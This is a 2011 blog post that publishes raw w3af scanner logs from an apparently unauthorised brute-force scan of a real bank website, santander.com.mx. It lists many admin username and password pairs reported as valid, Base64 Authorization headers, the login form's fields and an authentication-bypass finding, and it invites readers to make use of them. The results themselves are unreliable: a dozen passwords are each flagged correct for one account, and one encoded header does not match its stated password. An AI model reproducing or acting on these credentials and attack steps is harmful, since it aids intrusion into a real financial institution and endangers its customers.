Thursday, May 26, 2011

Santander Vulnerable

Greetings, Free World

Here is another one.

[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: grep.collectCookies
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: grep.error500
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: grep.getMails
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: grep.lang
[Thu 26 May 2011 10:05:46 PM CDT] The page language is: es
[Thu 26 May 2011 10:05:46 PM CDT] The remote HTTP Server ommited the "server" header in it's response. This information was found in the request with id 48.
[Thu 26 May 2011 10:05:47 PM CDT] The resource: "http://www.santander.com.mx/NuevaVersion/" requires authentication. The realm is: "Basic realm="Sun ONE Web Server"". This information was found in the request with id 53.
[Thu 26 May 2011 10:05:56 PM CDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 10:05:56 PM CDT] http://www.santander.com.mx/NuevaVersion/index.html is a registration form.
[Thu 26 May 2011 10:05:56 PM CDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 10:05:56 PM CDT] Starting basic authentication bruteforce on URL: "http://www.santander.com.mx/NuevaVersion/".
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 101.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 103.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/dragon. This vulnerability was found in the request with id 102.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/123abc. This vulnerability was found in the request with id 104.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/pa55. This vulnerability was found in the request with id 105.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/admin123. This vulnerability was found in the request with id 107.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/d474b453. This vulnerability was found in the request with id 108.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/73mp123. This vulnerability was found in the request with id 106.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/letmein. This vulnerability was found in the request with id 110.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/nopassword. This vulnerability was found in the request with id 109.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/supervisor. This vulnerability was found in the request with id 111.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/codename. This vulnerability was found in the request with id 112.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/7emp. This vulnerability was found in the request with id 113.
[Thu 26 May 2011 10:06:00 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 114.
[Thu 26 May 2011 10:06:00 PM CDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 10:06:00 PM CDT] http://www.santander.com.mx/NuevaVersion/index.html is a registration form.
[Thu 26 May 2011 10:06:00 PM CDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 10:06:00 PM CDT] Found 2 URLs and 3 different points of injection.
[Thu 26 May 2011 10:06:00 PM CDT] The list of URLs is:
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/index.html
[Thu 26 May 2011 10:06:00 PM CDT] The list of fuzzable requests is:
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/ | Method: GET
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/index.html | Method: GET
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/index.html | Method: POST | Parameters: (miURL="/schmexapp...", pag="/schmexapp...", login.claveCliente="", login.NIP="", irAmodulo="1")
[Thu 26 May 2011 10:06:30 PM CDT] Too many retries (2) while requesting: http://www.santander.com.mx/NuevaVersion/index.html
[Thu 26 May 2011 10:06:43 PM CDT] The resource: "http://www.santander.com.mx/NuevaVersion/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.
[Thu 26 May 2011 10:07:16 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 101.
[Thu 26 May 2011 10:07:16 PM CDT] The remote HTTP Server ommited the "server" header in it's response. This information was found in the request with id 48.
[Thu 26 May 2011 10:07:16 PM CDT] The URL "http://www.santander.com.mx/NuevaVersion/" has the following allowed methods: GET, HEAD, POST.
[Thu 26 May 2011 10:07:17 PM CDT] The thread: raised an exception while running the request: bound method localFileInclude._sendMutant of >

basicAuthBrute auth

Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 101.

GET http://www.santander.com.mx/NuevaVersion/ HTTP/1.1
Authorization: Basic YWRtaW46YWJjZGU=
Host: www.santander.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)


Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 103.

GET http://www.santander.com.mx/NuevaVersion/ HTTP/1.1
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Host: www.santander.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)


Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 114.

GET http://www.santander.com.mx/NuevaVersion/ HTTP/1.1
Authorization: Basic YWRtaW46cWF6d3N4
Host: www.santander.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)


htaccessMethods=auth

The resource: "http://www.santander.com.mx/NuevaVersion/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.


I leave them here for you to study.

Greetings, Free World.
